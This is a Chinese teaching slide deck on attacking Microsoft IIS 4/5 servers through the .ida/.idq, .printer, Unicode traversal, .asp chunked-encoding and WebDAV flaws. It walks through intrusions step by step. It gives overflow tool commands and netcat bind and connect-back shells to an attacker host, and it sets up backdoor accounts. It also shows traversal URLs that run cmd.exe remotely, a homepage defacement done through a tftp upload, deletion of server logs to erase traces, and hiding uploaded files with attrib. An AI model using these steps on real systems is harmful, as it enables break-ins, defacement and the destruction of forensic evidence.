《IIS漏洞攻击PPT课件》由会员分享,可在线阅读,更多相关《IIS漏洞攻击PPT课件(36页珍藏版)》请在金锄头文库上搜索。
1、IIS漏洞攻击,2,基于认证的入侵,IPC$入侵 远程管理计算机 Telnet入侵 远程命令的执行及进程查杀 注册表的入侵 暴力破解密码,3,基于漏洞攻击概述,黑客是信息时代的完美主义者,他们通过研究、试验、编写测试代码来发现远程服务器中的漏洞 通过利用远程服务器的漏洞,可以绕过系统的认证直接进入系统内部 常用的漏洞 IIS漏洞 操作系统漏洞 SQL服务器漏洞,4,IIS漏洞概述,IIS(Internet Information Server),即Internet信息服务器,它在Windows系统中提供Internet服务,例如提供Web服务、FTP服务、SMTP服务 IIS服务器在方便用户使
2、用的同时,带来了许多安全隐患。IIS漏洞有近千余种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。 对于溢出型漏洞,入侵者可以通过发送特定指令格式的数据使远程服务区的缓冲区溢出,从而突破系统的保护,在溢出的空间中执行任意指令。,5,主要的IIS漏洞,.ida&.idq漏洞 Printer漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞,6,IIS漏洞信息的搜集,使用扫描软件扫描存在漏洞的主机,例如使用X-Scan进行IIS漏洞的扫描 使用telnet targetIP 80搜集Web服务器版本信息,7,.ida&.idq漏洞,微软的Index Server可以加快Web的
3、搜索能力,提供对管理员脚本河Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq 管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的 idq.dll存在一个缓冲溢出,问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数进行边界检查,可以导致远程攻击者利用溢出来获得System权限访问远程系统,8,.ida&.idq漏洞的检测,使用X-Scan、Sfind等检测工具 手工检测:在地址栏中输入http:/targetIP/*.ida或者http:/targetIP/*.idq,9,IDQ入侵工具IISIDQ,IISIDQ有命令行和图形界面两种方式。使
4、用IISIDQ攻击远程服务器后,有两种登录方式 攻击后主动连接方式命令 iisidq.exe输入命令1 攻击后监听远程服务器连接命令 iisidq.exe输入命令1 如果不写输入命令,默认命令为cmd.exe/c+dir。如果使用1,表示不使用默认命令而是要用户输入命令,10,IISIDQ支持的操作系统类型,0 IIS5 中文 Win2000 Sp0 1 IIS5 中文 Win2000 Sp1 2 IIS5 中文 Win2000 Sp2,11,漏洞溢出连接工具-NC,nc在网络工具中有“瑞士军刀”的美誉,通过nc,入侵者可以方便的连接远程服务器 nc有两种方法进行连接 主动连接到外部:nc-o
5、ptions hostname ports ports 监听等待外部连接:nc l p port -option hostname port,12,NC的使用参数说明,-e:prog程序重定向,一旦连接,就执行 -g:网关路由跳数,可设置到8 -h:帮助信息 -i:secs延时的间隔 -l:监听模式,用于入站连接 -n:指定数字的IP地址,不能用hostname -o:file记录16进制的传输 -p:port本地端口号 -r:任意指定本地及远程端口 -s:addr本地源地址 -u:UDP模式 -v:详细输出(用两个-v可得到更详细的内容) -w:secs超时时间 -z:将输入输出关掉用于扫描
6、时,13,.idq入侵实例(一),步骤一:扫描远程服务器 步骤二:IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq 0 192.168.0.106 80 1 521,14,.idq入侵实例(一),步骤三:使用nc进行连接。使用命令nc v 192.168.0.106 521。,15,.idq入侵实例(一),步骤四:建立后门帐号 步骤五:使用exit命令断开连接 比较命令如图所示,16,.idq入侵实例(二),步骤一:扫描远程服务器 步骤二:使用nc在本地打开端口等待连接。使用命令 nc -l p 250。参数-l表示使用监听模式,-p表示设置本地监听端口250,17,.i
7、dq入侵实例(二),步骤三:IDQ溢出。使用命令iisidq 0 192.168.0.106 80 2 192.168.0.100 250 1采用方式二进行溢出,使远程服务器溢出后自动连接到本地计算机的250端口,18,.idq入侵实例(二),步骤四:进行溢出后的攻击 步骤五:建立后门帐号 步骤六:使用exit命令断开连接,19,IISIDQ的图形界面,20,.printer漏洞,windows2000 IIS 5存在打印扩展ISAPI(Internet Service Application Programming Interface),使得.printer扩展与msw3prt.dll进行映
8、射,该扩展可以通过Web调用打印机 在msw3prt.dll中存在缓冲区溢出漏洞 微软建议,一般在未打补丁之前,一定要移除ISAPI网络打印的映射,21,.printer漏洞入侵,步骤一:使用nc监听端口 步骤二:使用IIS5Exploit进行漏洞溢出,命令格式IIS5Exploit,22,Unicode目录遍历漏洞,微软IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“”,从而可以利用“./”目录遍历的漏洞 该漏洞帐号默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑分区上的能被这些组访问的文件都能被删除,修改或执行 入侵者不能像使用.ida
9、和.idq漏洞那样,直接溢出一个拥有管理员权限的shell,而只是具有IUSR_machinename权限,也就是说,只能进行简单的文件操作。 使用Unicode构造“/”和“”字符举例 %c1%1c(0 xc1-0 xc0)*0 x40+0 x1c=0 x5c=/ %c0%2f(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=,23,不同操作系统对应的Unicode,24,手工检测漏洞,远程系统Windows2000 server中文版 在地址栏输入:http:/192.168.0.106/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+d
10、ir+c:”,25,命令说明,命令中的“+”,代表空格 192.168.0.106远程服务器IP地址 scripts为远程服务器上的脚本文件目录 “.%c1%1c”被远程服务器译为“./” winnt/system32/cmd.exe?/c+打开远程服务器的cmd.exe,一般不用改变 dir+c:入侵者要执行的命令 利用此命令,入侵者将IE编程了远程命令的控制台,26,Unicode入侵实例涂鸦主页,步骤一:准备标语主页,并保存成index.htm 步骤二:探知远程服务器的Web根目录 方法一:利用.ida或者.idq漏洞。 方法二:输入http:/192.168.0.106/scripts
11、/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:mmc.gif/s其中,/s表示在dir命令后查找指定文件或文件夹的物理路径,mmc.gif是默认安装在Web根目录中的,找到该文件的同时,也就找到了Web根目录。,27,Unicode入侵实例涂鸦主页,步骤三:涂鸦主页。在地址栏中使用Unicode漏洞查询Web服务器主页,假设是index.htm。使用tftp将自己做好的主页替换掉原Web服务器的主页 tftp的使用 tftp只要执行tftpd32.exe,本计算机就成为一台tftp服务器 使用windows自带的tftp命令便可以在该服务器上传和下载文件
12、使用方法:tftp -i host GET/PUT source destination -I二进制文件传输 host tftp服务器地址 Get下载文件 PUT上传文件 Source文件名 destination目的地,28,Unicode入侵实例涂鸦主页,29,Unicode入侵实例涂鸦主页,30,Unicode漏洞的实例二擦脚印,通过Unicode漏洞进入远程服务器后,肯定会在该服务器上留下自己的ip,为了隐藏自己,通常需要清除服务器的日志,这种做法叫作擦脚印。 Del+c:winntsystem32logfiles*.* Del+c:winntsystem32confige*.evt
13、Del+c:winntsystem32dtclog*.* Del+c:winntsystem32*.log Del+c:winntsystem32*.txt Del+c:winnt*.txt Del+c:winnt*.log Unicode获得的权限较低,一般无法执行bat文件,31,Unicode漏洞实例三修改文件属性,入侵过程中,入侵者通常希望隐藏自己的文件。如果上传的文件设置成“隐藏”加“系统”属性,就可以避免被发现 Attrib命令的使用:Attrib +R|-R +A|-A +S|-S +H|-H drive: path filename /S/D +:设置属性 -:清除属性 R:只
14、读文件属性 A:存档文件属性 S:系统文件属性 H:隐藏文件属性 /S:处理当前文件夹及其子文件夹中的匹配文件 /D:处理文件夹。,32,Unicode漏洞实例三修改文件属性,如果要把c盘中的abc.exe设置成“系统”加“隐藏”属性,使用命令“attrib.exe+%2bH+%2bS+c:abc.exe”其中,“%2b” 表示“+”号 类似,要取消掉隐藏和系统属性,使用命令“attrib.exe+-H+-S+c:abc.exe”,33,.ASP映射分块编码漏洞,Windows 2000和NT4 IIS .asp映射存在远程缓冲溢出漏洞。 ASP ISAPI过滤器默认在所有NT4和WIN200
15、0系统中装载,存在的漏洞可以导致远程执行任意命令。 恶意攻击者可以使用分块编码形式数据给IIS服务器,当解码和解析这些数据的时候可以强迫IIS把入侵者提供的数据写到内存任意位置。通过此漏洞可以导致WIN2000系统产生缓冲区溢出并以IWAM_computer_name用户的权限执行任意代码,而在WINDOWS NT4下可以以system的权限执行任意代码,34,.ASP映射分块编码漏洞,使用工具:IIS ASP.DLL OVERFLOW PROGRAM 2.0 Aspcode 使用方法:aspcode aspfilewebportwinxp或aspcode 参数说明: :远程服务器 aspfi
16、le:远程服务器上ASP文件所在的路径。 Webport:远程服务器web服务端口。 winxp:winxp 模式。,35,WebDAV远程缓冲区漏洞,Microsoft 5.0带有WebDav组件对用户输入的传递给ntdll.dll程序处理的请求未做充分的边界检查,远程入侵者可以向WebDav提交一个精心构造的超长数据请求而导致缓冲区溢出,使得入侵者以LocalSystem权限在主机上执行任意指令 漏洞检测工具WebDavScan,36,WebDAV远程缓冲区漏洞,漏洞利用工具 wd0.3-en.exe:英文版IIS溢出工具,与nc配合使用 BIG5.exe:繁体版IIS溢出工具 Webdavx3:中文版IIS溢出工具,溢出后打开7788端口等待连接 WebDav:突破防火墙的WebDav溢出工具,
